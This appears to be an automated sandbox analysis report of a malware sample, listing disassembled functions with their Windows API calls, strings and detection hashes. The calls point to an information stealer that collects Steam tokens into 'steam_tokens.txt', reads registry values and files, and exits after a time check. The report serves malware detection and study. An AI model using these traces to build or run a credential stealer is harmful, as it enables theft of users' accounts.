                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 2252c904bdbc4cc7f1ebe1dcfebc2d761f92fabe18491a86bd827f0af6dba730
                                    • Instruction ID: a22e89d5af7e480add8dc1e6ec5f3160f5aa6e6ab42f23ab5d4c9d8a457adb6c
                                    • Opcode Fuzzy Hash: 2252c904bdbc4cc7f1ebe1dcfebc2d761f92fabe18491a86bd827f0af6dba730
                                    • Instruction Fuzzy Hash: BB41C97191011DABDB65EBA4DD42EED7378FF48300F0444A9B63AD7240DB789E84AB91
                                    Function 00F7ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7ECDF
                                    • lstrlen.KERNEL32(00000000), ref: 00F7ECF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ED1D
                                    • lstrlen.KERNEL32(00000000), ref: 00F7ED24
                                    • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00F7ED52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 367037083-401951677
                                    • Opcode ID: 16bad9b8c5ec67387ec96c8c60aa6190e3c8b4ff531aff395255cbc6731f7e3c
                                    • Instruction ID: 5521ecb7bc7d5ac134f1af5bdf92001313ca7c535949727ef0bda271f8aed240
                                    • Opcode Fuzzy Hash: 16bad9b8c5ec67387ec96c8c60aa6190e3c8b4ff531aff395255cbc6731f7e3c
                                    • Instruction Fuzzy Hash: 6831E631A119055BC772BBB8ED4A95E77A8AF44310F084075F85ADB202EB7CDC05B7D2
                                    Function 00F69A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00F6140E), ref: 00F69A9A
                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00F6140E), ref: 00F69AB0
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,00F6140E), ref: 00F69AC7
                                    • ReadFile.KERNEL32(00000000,00000000,?,00F6140E,00000000,?,?,?,00F6140E), ref: 00F69AE0
                                    • LocalFree.KERNEL32(?,?,?,?,00F6140E), ref: 00F69B00
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00F6140E), ref: 00F69B07
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 5187e7db0bf877a2be70ee522774b192f0c851c3d47d8a14a98b6ae456221aac
                                    • Instruction ID: f566e01dd3efbdf23e35904cf9841e09de21faffc90d1c847252cfbcf1bee029
                                    • Opcode Fuzzy Hash: 5187e7db0bf877a2be70ee522774b192f0c851c3d47d8a14a98b6ae456221aac
                                    • Instruction Fuzzy Hash: 7F116371A04209AFD720DFA9DCC8EBE736CEB45754F100169F92197180D7B4DD90DBA1
                                    Function 00F85AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85B14
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00F85B7C
                                    • memmove.MSVCRT(00000000,?,?), ref: 00F85B89
                                    • memmove.MSVCRT(00000000,?,?), ref: 00F85B98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long
                                    • API String ID: 2052693487-3788999226
                                    • Opcode ID: f092cf6992e39eabf63004996dfa67804f5882333d23a311ecd6ea71f15598da
                                    • Instruction ID: 45ba7ea71cf92c8785d36a5c3667ba0b9e72eea65e5fabea566d0b46c52f5085
                                    • Opcode Fuzzy Hash: f092cf6992e39eabf63004996dfa67804f5882333d23a311ecd6ea71f15598da
                                    • Instruction Fuzzy Hash: 26417F72B005199FCF08DF6CCD95AAEBBB5EB99710F148229E909E7384E634DD018B90
                                    Function 00F77D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77D58
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1D5
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77D76
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                    • String ID: invalid string position$string too long
                                    • API String ID: 3310641104-4289949731
                                    • Opcode ID: 250f102558e52bb121b4d50d5d1c241065c60c3dde6dd6b69dc0b2a823519b0b
                                    • Instruction ID: 830f8cb2f495378d5203ceb21467c65b8c4a491576b8c52dc72ef9a5e6474da2
                                    • Opcode Fuzzy Hash: 250f102558e52bb121b4d50d5d1c241065c60c3dde6dd6b69dc0b2a823519b0b
                                    • Instruction Fuzzy Hash: BF21A5323147004BD730AE6CD881A3AB7E5EFA5760B208A6FE4598B241D771DC4197A6
                                    Function 00F833C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F833EF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F833F6
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00F83411
                                    • wsprintfA.USER32 ref: 00F83437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB
                                    • API String ID: 2922868504-2651807785
                                    • Opcode ID: 260b243c7d6516bcac58ef837c8fe2a2bc1c49f2179e8b01a7cee725169a220f
                                    • Instruction ID: d09a83a79f7a378813bfeccdfd9944e23cfd1d064dfbfa02e51b8ba444afd133
                                    • Opcode Fuzzy Hash: 260b243c7d6516bcac58ef837c8fe2a2bc1c49f2179e8b01a7cee725169a220f
                                    • Instruction Fuzzy Hash: 2001B971A04218ABDB14DF98DC45BADB77CFB45B10F000129F926E7380D77559008792
                                    Function 00F7D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00A9DCD0,00000000,00020119,?), ref: 00F7D7F5
                                    • RegQueryValueExA.ADVAPI32(?,00A9E508,00000000,00000000,00000000,000000FF), ref: 00F7D819
                                    • RegCloseKey.ADVAPI32(?), ref: 00F7D823
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7D848
                                    • lstrcat.KERNEL32(?,00A9E388), ref: 00F7D85C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 02c6485bee722a3099140b948bda4a39054b5bfc49d1aa9464ce9b64c47479fb
                                    • Instruction ID: afc01834daecd5ec7fd51969a4b9bf53e7f79b448a4eee86483c4984395628ef
                                    • Opcode Fuzzy Hash: 02c6485bee722a3099140b948bda4a39054b5bfc49d1aa9464ce9b64c47479fb
                                    • Instruction Fuzzy Hash: 4A415271A1010C9FCB68EF64EC82BDE7778AF54304F448065B51AD7241EB78AE85DF91
                                    Function 00F77EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F77F31
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F77F60
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F77FA5
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F77FD3
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F78007
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 616aa798a227f3fbabba31856f69cbb6b92fffb4125d2bfdf8db15205083975f
                                    • Instruction ID: 62dbe689709d9d3d468969bad5d523218c9f54676c030819fc510393fe3f370d
                                    • Opcode Fuzzy Hash: 616aa798a227f3fbabba31856f69cbb6b92fffb4125d2bfdf8db15205083975f
                                    • Instruction Fuzzy Hash: 0F41B23190420ADFCB20EF68D580EDEB7B8FF54310B11809AE819D7245E775EA52DBD2
                                    Function 00F78050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F780BB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F780EA
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F78102
                                    • lstrlen.KERNEL32(00000000), ref: 00F78140
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7816F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 0a5a4ef4d05379ce5d2c733de46e28d20948e3fecf6525ec61729ba7e4c2094f
                                    • Instruction ID: 07a56ad202c9bb3c5463ba237e696197656c9b297116992e88f364344975968b
                                    • Opcode Fuzzy Hash: 0a5a4ef4d05379ce5d2c733de46e28d20948e3fecf6525ec61729ba7e4c2094f
                                    • Instruction Fuzzy Hash: 2D410231A40106DFCB20DF78D998BAABBF4EF44350F00802EA859D7204EF74D942DB91
                                    Function 00F81B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00F81B72
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8184F
                                      • Part of subcall function 00F81820: lstrlen.KERNEL32(00A87328), ref: 00F81860
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F81887
                                      • Part of subcall function 00F81820: lstrcat.KERNEL32(00000000,00000000), ref: 00F81892
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F818C1
                                      • Part of subcall function 00F81820: lstrlen.KERNEL32(00F94FA0), ref: 00F818D3
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F818F4
                                      • Part of subcall function 00F81820: lstrcat.KERNEL32(00000000,00F94FA0), ref: 00F81900
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F8192F
                                    • sscanf.NTDLL ref: 00F81B9A
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F81BB6
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F81BC6
                                    • ExitProcess.KERNEL32 ref: 00F81BE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 3040284667-0
